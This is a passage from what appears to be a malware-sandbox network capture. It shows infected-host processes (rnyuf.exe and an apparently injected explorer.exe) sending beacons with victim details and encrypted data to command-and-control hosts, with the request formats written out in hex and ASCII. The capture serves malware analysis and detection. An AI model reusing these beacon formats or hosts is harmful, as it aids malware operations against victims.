6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:10.539788961 CEST	17486	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
117	192.168.2.3	49844	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:10.687650919 CEST	17488	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:10.714119911 CEST	17490	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:10.714169979 CEST	17490	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
118	192.168.2.3	49843	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:10.801618099 CEST	17490	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 270 Host: atvcampingtrips.com
Aug 23, 2021 02:09:10.801635981 CEST	17491	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 2f 0b eb e3 Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vu/d)d[$E<4Pbem]08n7DyxtI>`j_r,@_KU:P?10P[-y\|Kj4$(
Aug 23, 2021 02:09:11.679712057 CEST	17698	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:09:11 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
119	192.168.2.3	49845	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:10.849633932 CEST	17491	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:10.877295017 CEST	17494	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:10.877309084 CEST	17494	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49734	220.125.1.129	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:36.611932039 CEST	8623	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: atvcampingtrips.com
Aug 23, 2021 02:08:36.611984968 CEST	8623	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 38 03 cf a4 Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vu8D=lFp?m[ac"PNS0CLo}>!)f$iZ.tb1m(d<ocdKyX_JacO&G
Aug 23, 2021 02:08:37.851044893 CEST	8628	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:37 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 52 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 52 39 08 a5 6c 58 b5 ad 1e bd cf b0 f9 6d 92 21 c7 ed 2e 15 11 83 89 9c 81 6f d8 66 5b 16 87 07 Data Ascii: #\(R9lXm!.of[

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
120	192.168.2.3	49846	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:11.034353971 CEST	17502	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:11.060467005 CEST	17504	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 